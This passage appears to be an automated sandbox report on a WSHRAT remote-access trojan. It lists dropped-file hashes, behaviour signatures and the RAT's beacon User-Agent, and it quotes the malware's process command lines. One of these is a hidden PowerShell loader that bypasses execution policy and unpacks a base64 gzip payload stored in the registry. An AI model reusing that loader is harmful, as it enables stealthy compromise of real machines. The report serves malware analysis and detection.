| SHA512 | b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | ac290dad7cb4ca2d93516580452eda1c |
| SHA1 | fa949453557d0049d723f9615e4f390010520eda |
| SHA256 | c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382 |
| SHA512 | b5e2b9f5a9dd8a482169c7fc05f018ad8fe6ae27cb6540e67679272698bfca24b2ca5a377fa61897f328b3deac10237cafbd73bc965bf9055765923aba9478f8 |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 849f2c3ebf1fcba33d16153692d5810f |
| SHA1 | 1f8eda52d31512ebfdd546be60990b95c8e28bfb |
| SHA256 | 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d |
| SHA512 | 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 849f2c3ebf1fcba33d16153692d5810f |
| SHA1 | 1f8eda52d31512ebfdd546be60990b95c8e28bfb |
| SHA256 | 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d |
| SHA512 | 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5 |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | a2f2258c32e3ba9abf9e9e38ef7da8c9 |
| SHA1 | 116846ca871114b7c54148ab2d968f364da6142f |
| SHA256 | 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33 |
| SHA512 | e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | a2f2258c32e3ba9abf9e9e38ef7da8c9 |
| SHA1 | 116846ca871114b7c54148ab2d968f364da6142f |
| SHA256 | 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33 |
| SHA512 | e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-math-l1-1-0.dll
| MD5 | 8b0ba750e7b15300482ce6c961a932f0 |
| SHA1 | 71a2f5d76d23e48cef8f258eaad63e586cfc0e19 |
| SHA256 | bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed |
| SHA512 | fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-math-l1-1-0.dll
| MD5 | 8b0ba750e7b15300482ce6c961a932f0 |
| SHA1 | 71a2f5d76d23e48cef8f258eaad63e586cfc0e19 |
| SHA256 | bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed |
| SHA512 | fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 72e28c902cd947f9a3425b19ac5a64bd |
| SHA1 | 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7 |
| SHA256 | 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1 |
| SHA512 | 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 72e28c902cd947f9a3425b19ac5a64bd |
| SHA1 | 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7 |
| SHA256 | 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1 |
| SHA512 | 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | fefb98394cb9ef4368da798deab00e21 |
| SHA1 | 316d86926b558c9f3f6133739c1a8477b9e60740 |
| SHA256 | b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7 |
| SHA512 | 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | fefb98394cb9ef4368da798deab00e21 |
| SHA1 | 316d86926b558c9f3f6133739c1a8477b9e60740 |
| SHA256 | b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7 |
| SHA512 | 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8 |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-string-l1-1-0.dll
| MD5 | 404604cd100a1e60dfdaf6ecf5ba14c0 |
| SHA1 | 58469835ab4b916927b3cabf54aee4f380ff6748 |
| SHA256 | 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c |
| SHA512 | da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-crt-string-l1-1-0.dll
| MD5 | 404604cd100a1e60dfdaf6ecf5ba14c0 |
| SHA1 | 58469835ab4b916927b3cabf54aee4f380ff6748 |
| SHA256 | 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c |
| SHA512 | da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 0d1aa99ed8069ba73cfd74b0fddc7b3a |
| SHA1 | ba1f5384072df8af5743f81fd02c98773b5ed147 |
| SHA256 | 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1 |
| SHA512 | 6b1a87b1c223b757e5a39486be60f7dd2956bb505a235df406bcf693c7dd440e1f6d65ffef7fde491371c682f4a8bb3fd4ce8d8e09a6992bb131addf11ef2bf9 |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-file-l2-1-0.dll
| MD5 | e479444bdd4ae4577fd32314a68f5d28 |
| SHA1 | 77edf9509a252e886d4da388bf9c9294d95498eb |
| SHA256 | c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719 |
| SHA512 | 2afab302fe0f7476a4254714575d77b584cd2dc5330b9b25b852cd71267cda365d280f9aa8d544d4687dc388a2614a51c0418864c41ad389e1e847d81c3ab744 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-file-l2-1-0.dll
| MD5 | e479444bdd4ae4577fd32314a68f5d28 |
| SHA1 | 77edf9509a252e886d4da388bf9c9294d95498eb |
| SHA256 | c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719 |
| SHA512 | 2afab302fe0f7476a4254714575d77b584cd2dc5330b9b25b852cd71267cda365d280f9aa8d544d4687dc388a2614a51c0418864c41ad389e1e847d81c3ab744 |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | babf80608fd68a09656871ec8597296c |
| SHA1 | 33952578924b0376ca4ae6a10b8d4ed749d10688 |
| SHA256 | 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca |
| SHA512 | 3ffffd90800de708d62978ca7b50fe9ce1e47839cda11ed9e7723acec7ab5829fa901595868e4ab029cdfb12137cf8ecd7b685953330d0900f741c894b88257b |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | babf80608fd68a09656871ec8597296c |
| SHA1 | 33952578924b0376ca4ae6a10b8d4ed749d10688 |
| SHA256 | 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca |
| SHA512 | 3ffffd90800de708d62978ca7b50fe9ce1e47839cda11ed9e7723acec7ab5829fa901595868e4ab029cdfb12137cf8ecd7b685953330d0900f741c894b88257b |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-file-l1-2-0.dll
| MD5 | e2f648ae40d234a3892e1455b4dbbe05 |
| SHA1 | d9d750e828b629cfb7b402a3442947545d8d781b |
| SHA256 | c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03 |
| SHA512 | 18d4e7a804813d9376427e12daa444167129277e5ff30502a0fa29a96884bf902b43a5f0e6841ea1582981971843a4f7f928f8aecac693904ab20ca40ee4e954 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-file-l1-2-0.dll
| MD5 | e2f648ae40d234a3892e1455b4dbbe05 |
| SHA1 | d9d750e828b629cfb7b402a3442947545d8d781b |
| SHA256 | c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03 |
| SHA512 | 18d4e7a804813d9376427e12daa444167129277e5ff30502a0fa29a96884bf902b43a5f0e6841ea1582981971843a4f7f928f8aecac693904ab20ca40ee4e954 |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | d0289835d97d103bad0dd7b9637538a1 |
| SHA1 | 8ceebe1e9abb0044808122557de8aab28ad14575 |
| SHA256 | 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a |
| SHA512 | 97c47b2e1bfd45b905f51a282683434ed784bfb334b908bf5a47285f90201a23817ff91e21ea0b9ca5f6ee6b69acac252eec55d895f942a94edd88c4bfd2dafd |
C:\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | d0289835d97d103bad0dd7b9637538a1 |
| SHA1 | 8ceebe1e9abb0044808122557de8aab28ad14575 |
| SHA256 | 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a |
| SHA512 | 97c47b2e1bfd45b905f51a282683434ed784bfb334b908bf5a47285f90201a23817ff91e21ea0b9ca5f6ee6b69acac252eec55d895f942a94edd88c4bfd2dafd |
\Users\Admin\AppData\Local\Temp\wshsdk\api-ms-win-core-localization-l1-2-0.dll
| MD5 | eff11130bfe0d9c90c0026bf2fb219ae |
| SHA1 | cf4c89a6e46090d3d8feeb9eb697aea8a26e4088 |
| SHA256 | 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97 |
| SHA512 | 8133fb9f6b92f498413db3140a80d6624a705f80d9c7ae627dfd48adeb8c5305a61351bf27bbf02b4d3961f9943e26c55c2a66976251bb61ef1537bc8c212add |
\Users\Admin\AppData\Local\Temp\wshsdk\ucrtbase.dll
| MD5 | d6326267ae77655f312d2287903db4d3 |
| SHA1 | 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f |
| SHA256 | 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9 |
| SHA512 | 11db71d286e9df01cb05acef0e639c307efa3fef8442e5a762407101640ac95f20bad58f0a21a4df7dbcda268f934b996d9906434bf7e575c4382281028f64d4 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\encodings\__init__.py
| MD5 | 82afd9dcb28c19afdc42097fcbdbe662 |
| SHA1 | 329e052afe981c8ba32ff78df2deb9d041c05f8b |
| SHA256 | 921635dcb46ba5192db20e6c7ed0429c647f7d55ead2f6feaadc00b8410a646e |
| SHA512 | 4ae0a9de57f0df6119b99be7168e35917da63e24487b67a4afe96d3996cc42ad22716ac411791998642498bd5f64ab14d9571f4ebf2ee5abc6eb2761270cc897 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc
| MD5 | e3f691d123a890f18538f5fead7bd6cd |
| SHA1 | f6e77a0008cefa3a7e3f67c7d11c7787391db5d9 |
| SHA256 | 3473f433a4d2c09e637f6da9b21172d31468a453c2b47fff27f776e820f25934 |
| SHA512 | 776e40399adb6e7211ed67022c2b1b12309e5436760c7a0104fe243610e87559f9890575b972cc569d8d793c2d94c70e2f051f36d803ca7c8c89f77f0b39cc23 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\codecs.py
| MD5 | d1d8d96ee5398cda53cbddca69b8e2ab |
| SHA1 | 3998c0a2124ab260a7d83f296228be90418b8366 |
| SHA256 | 39f79489cb6ef0f95dc0ae007c5ece25897f76fa9b56449922f764896cec5ed3 |
| SHA512 | 0d324416498fba44b41d175194527d5035176642e535bb446ac2c64feed175df7c316507bda375baa77907465973d1340999c859b5d20b51cc2bd96a30857b7b |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\__pycache__\codecs.cpython-37.pyc
| MD5 | 31a2fe679cad1b609caba7c961f43d70 |
| SHA1 | 21d411d11ce126c054ea70f90196c81b18eaa550 |
| SHA256 | 6b903c49e04070578aa47a378ff830bc9407be92c8b952a134cec40e944fa30d |
| SHA512 | 34dde13a6a197caf1ed9fe73ca30e70c966027c44509e398334a6e9be8eb8f5c3289ef66383f3d9cc69da26cca2097c48cb5fde7be14476fe35fd2cc087da855 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\__pycache__\io.cpython-37.pyc
| MD5 | deddc1aebef1d56aa912f32deff5355f |
| SHA1 | 472c6923a8fae0cfb7fba6890f2c37dfaf685bcc |
| SHA256 | c27434a09d7e90d3e7980427fa6d22d0eb570663e110b68dd9a71f8bcc3aad24 |
| SHA512 | 89edddf61d0ce04650e5886f5dc98931a3ac52ecacac6e8fe78ff2b3c5db5943118b600ca05fec3d4022a6469dfeeea0979b03313fbabfc057ac5772103bd328 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\io.py
| MD5 | 2c098fb1d1a4c0a183da506daa34a786 |
| SHA1 | 55fb1833342ad13c35c6d3cb5fda819327773b21 |
| SHA256 | f89251a16945f7c125554cc91c7e7ed1560b366396c3153a4cadfb7a7133cd03 |
| SHA512 | 375903e7bf79cf6c8e7c4decff482f4b59594aaaef62e01f1f45d0f9e26f9e864690d79cdfbdcf46cd83562cc465ef419cac32739d35bcb9fe6124682a997918 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\encodings\__pycache__\latin_1.cpython-37.pyc
| MD5 | 2312f7d16eed297caa4a0da46f612479 |
| SHA1 | afc6f0ff4b5d57204b20c4127a58e8cdb0f1f09d |
| SHA256 | 3b033fb54ed66cfd73e6cd1479e3a7d7166d70d713d232707dd2b28ac92af2c7 |
| SHA512 | 66faa5cc8ede6e929ac22ba48a6f1136a70879ccbdbe31146c1f4fb9f9d3744976e36fc47c533a3be4a6edb5b72870dc12018ac73924acf6217c17002c35815a |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\encodings\latin_1.py
| MD5 | 92c4d5e13fe5abece119aa4d0c4be6c5 |
| SHA1 | 79e464e63e3f1728efe318688fe2052811801e23 |
| SHA256 | 6d5a6c46fe6675543ea3d04d9b27ccce8e04d6dfeb376691381b62d806a5d016 |
| SHA512 | c95f5344128993e9e6c2bf590ce7f2cffa9f3c384400a44c0bc3aca71d666ed182c040ec495ea3af83abbd9053c705334e5f4c3f7c07f65e7031e95fdfb7a561 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\abc.py
| MD5 | 17e3407344267dde764ecaa542cccd4d |
| SHA1 | ec774abd2a9aa2729a8af6a9cd67dfb22fd0acae |
| SHA256 | f3bbcdb6406b9f9a3467ecd5a8ba74f1accb36adc95aa50d805c2927f09a2304 |
| SHA512 | 850b5f7293ac61d41eb5e13791aac643858daac0950ed1271ac1f3534184f8f379c248e94e63a9abbb699ae4436e4324a96daf5465abc6a50cbe99887024e1f6 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\encodings\__pycache__\utf_8.cpython-37.pyc
| MD5 | 96f8cc58ae6da7199951c19543193a61 |
| SHA1 | c9c75c757cb1ea2198f84d80de052db7d874b7c7 |
| SHA256 | e24b41e43dae2dcda0a88cae0dc52993ce66790d5addd498d772ea5406f6068e |
| SHA512 | fcb0d4c5f7ceac706b764caf495afb3517e807f89e3f21534997400c1b8fcfc7b23e09bfd3a4599ab4bdf388a36f3f9cd7c14f22ae9c48e03b1d85ed7a8c58dc |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\encodings\utf_8.py
| MD5 | f932d95afcaea5fdc12e72d25565f948 |
| SHA1 | 2685d94ba1536b7870b7172c06fe72cf749b4d29 |
| SHA256 | 9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e |
| SHA512 | a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\encodings\__pycache__\aliases.cpython-37.pyc
| MD5 | 840a56d291513211bd0e65864b9169f3 |
| SHA1 | af58891c07f864d4753baa1dfdbdd71a614cded1 |
| SHA256 | a597b04b97a8bfe577010d816ca8a1480247ea96b025c59c345b7b120bb5f922 |
| SHA512 | b1fbfbc5ca147fd0fcb9e7a509d5ec5a4578bb038a8116c908aa48ecd593694ab4d318b2bc6c8240bc6c2b4e2e23b7b6ed9d295619a862748ad3609445cd3d87 |
C:\Users\Admin\AppData\Local\Temp\wshsdk\lib\encodings\aliases.py
| MD5 | 794677da57c541836ef8c0be93415219 |
| SHA1 | 67956cb212acc2b5dc578cff48d1fe189e5274e4 |
| SHA256 | 9ed4517a5778b2efbd76704f841738c12441ff649eed83b2ea033b3843c9b3d5 |
| SHA512 | 33c3fa687ea494029ff6f250557eaaa24647f847255628b9198a8a33859db0a716d5a3c54743d58b796a46102f2a57da3445935ca0fef1245164523ff4294088 |
memory/1696-166-0x0000000000000000-mapping.dmp
memory/1092-167-0x0000000000000000-mapping.dmp
memory/1484-168-0x0000000000000000-mapping.dmp
memory/1788-169-0x0000000000000000-mapping.dmp
memory/1548-170-0x0000000000000000-mapping.dmp
memory/1548-171-0x0000000075C71000-0x0000000075C73000-memory.dmp
memory/596-172-0x0000000000000000-mapping.dmp
memory/1120-173-0x0000000000000000-mapping.dmp
memory/1760-174-0x0000000000000000-mapping.dmp
memory/1436-176-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-10-14 10:12
Reported
2021-10-14 10:14
Platform
win10-en-20210920
Max time kernel
149s
Max time network
146s
Command Line
Signatures
WSHRAT
Blocklisted process makes network request
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 880 set thread context of 1928 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings | C:\Windows\system32\wscript.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|A6E40E89|RSSLLXYN|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 17/10/2021|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\ID-92164.js
C:\Windows\regedit.exe
"regedit.exe" "C:\Users\Admin\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
